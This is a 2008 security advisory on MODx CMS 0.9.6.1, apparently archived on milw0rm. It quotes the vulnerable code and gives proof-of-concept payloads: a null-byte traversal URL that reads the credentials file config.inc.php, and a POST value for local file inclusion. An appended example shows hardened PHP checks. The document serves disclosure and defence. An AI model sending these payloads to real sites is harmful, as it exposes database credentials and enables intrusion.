########################## WwW.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: MODx CMS Vulnerabilities
# Vendor: http://modxcms.com
# Bugs: Source code disclosure, local file inclusion
# Vulnerable Version: 0.9.6.1 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix Available: No!
#
################################################################

####################
- Description:
####################

Quote from vendor: "MODx is an open source PHP Application Framework that helps you take control of your online content. It empowers developers and advanced users to give as much control as desired to whomever they desire for day-to-day website content maintenance chores."

####################
- Vulnerability:
####################

+--> Source code disclosure

Code Snippet:

/assets/js/htcmime.php Line#18-36

$fname = (array_key_exists("file", $_GET)) ? $_GET["file"] : "";

// basename() also strips \x00, we don't need to worry about ? and # in path:
// Must be real files anyway, fopen() does not support wildcards
$ext = array_pop(explode('.', basename($fname)));
// $ext is taken from the full string (".htc" after a NUL byte still passes),
// while file_exists() and fopen() stop at the first NUL byte
if (strcasecmp($ext, "htc") != 0 || !file_exists($fname))
    exit ("No file specified, file not found or illegal file.");

$flen = filesize($fname);

header("Content-type: text/x-component");
header("Content-Length: ".$flen);
header("Content-Disposition: inline; filename=$fname");

$fp = fopen($fname, "r");
echo fread($fp, $flen);
fclose($fp);

[As the developer's own comment hints] When magic_quotes_gpc is disabled, it is possible to bypass the extension check via null character injection (because of the null-terminating behavior of any function that uses fopen_wrappers), which results in source code disclosure.

PoC: http://localhost/modx-0.9.6.1/assets/js/htcmime.php?file=../../manager/includes/config.inc.php%00.htc


+--> Local file inclusion

Code Snippet:

/assets/snippets/AjaxSearch/AjaxSearch.php line#17-41

$stripHTML = $_POST['stripHTML'];
$stripSnip = $_POST['stripSnip'];
$stripSnippets = $_POST['stripSnippets'];
$useAllWords = $_POST['useAllWords'];
$searchStyle = $_POST['searchStyle'];
$minChars = $_POST['minChars'];
$maxResults = $_POST['maxResults'];
$showMoreResults = $_POST['showMoreResults'];
$moreResultsPage = $_POST['moreResultsPage'];
$as_language = $_POST['as_language'];   // taken straight from the request, never validated
$extract = $_POST['extract'];
$docgrp = $_POST['docgrp'];
$highlightResult = $_POST['highlightResult'];

include_once MODX_BASE_PATH . 'assets/snippets/AjaxSearch/includes/AjaxSearch.inc.php';
include MODX_BASE_PATH . 'assets/snippets/AjaxSearch/includes/templates.inc.php';

#include default language file
include(MODX_BASE_PATH . "assets/snippets/AjaxSearch/lang/english.inc.php");

#include other language file if set.
if($as_language!="english" && $as_language != '') {
    // $as_language is concatenated into the include path without any filtering
    if(file_exists(MODX_BASE_PATH . "assets/snippets/AjaxSearch/lang/".$as_language.".inc.php"))
        include MODX_BASE_PATH . "assets/snippets/AjaxSearch/lang/".$as_language.".inc.php";
}

There is no input validation here, so $as_language can be set to an arbitrary path, which results in local file inclusion (the trailing %00 in the PoC cuts off the ".inc.php" suffix that the code appends).

PoC:
Method=POST
Action=http://localhost/modx-0.9.6.1/index-ajax.php?
Name=as_language Value=../ajaxSearch_readme.txt%00
Name=q Value=assets/snippets/AjaxSearch/AjaxSearch.php

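As an added example (not MODx code, not part of the original advisory), the two checks rewritten the way a defender would harden them: NUL bytes rejected before any filesystem call, the .htc path canonicalised and confined to its directory, and the language name matched against a strict allow-list pattern. The function names, the temporary files and the sample inputs are constructed for this demonstration.

```php
<?php
// Added example (not MODx code): hardened versions of the two checks from the
// advisory. Function names safe_htc_path() and safe_language_file() are assumed.

// Resolved path of an .htc file inside $baseDir, or null if rejected.
function safe_htc_path(string $fname, string $baseDir): ?string
{
    if ($fname === '' || strpos($fname, "\0") !== false) {
        return null;                       // empty or NUL-truncation attempt
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . basename($fname));   // no subdirectories
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // The canonical path must stay inside $baseDir and really end in ".htc"
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    if (strtolower(pathinfo($real, PATHINFO_EXTENSION)) !== 'htc') {
        return null;
    }
    return $real;
}

// Language include path for $as_language, or null. Only plain lower-case
// names are accepted, so "../" and NUL bytes can never reach include().
function safe_language_file(string $as_language, string $langDir): ?string
{
    if (!preg_match('/^[a-z]{2,20}$/', $as_language)) {
        return null;
    }
    $path = $langDir . '/' . $as_language . '.inc.php';
    return is_file($path) ? $path : null;
}

// Constructed demonstration in a temporary directory (sample files, not MODx's).
$tmp = sys_get_temp_dir() . '/modx_demo_' . getmypid();
mkdir($tmp . '/js', 0700, true);
mkdir($tmp . '/lang', 0700, true);
file_put_contents($tmp . '/js/ie.htc', '<PUBLIC:COMPONENT/>');
file_put_contents($tmp . '/config.inc.php', '<?php $db_pass = "secret";');
file_put_contents($tmp . '/lang/french.inc.php', '<?php $lang = "fr";');

var_dump(safe_htc_path('ie.htc', $tmp . '/js') !== null);            // legitimate request
var_dump(safe_htc_path("../config.inc.php\0.htc", $tmp . '/js'));    // NUL injection
var_dump(safe_htc_path('../config.inc.php', $tmp . '/js'));          // traversal
var_dump(safe_language_file('french', $tmp . '/lang') !== null);     // legitimate language
var_dump(safe_language_file("../ajaxSearch_readme.txt\0", $tmp . '/lang'));
```

The first and fourth calls return a path; the three hostile inputs return null before any file is opened or included.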
####################
- Credit :
####################

Original Advisory: http://www.bugreport.ir/?/25
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

# milw0rm.com [2008-01-05]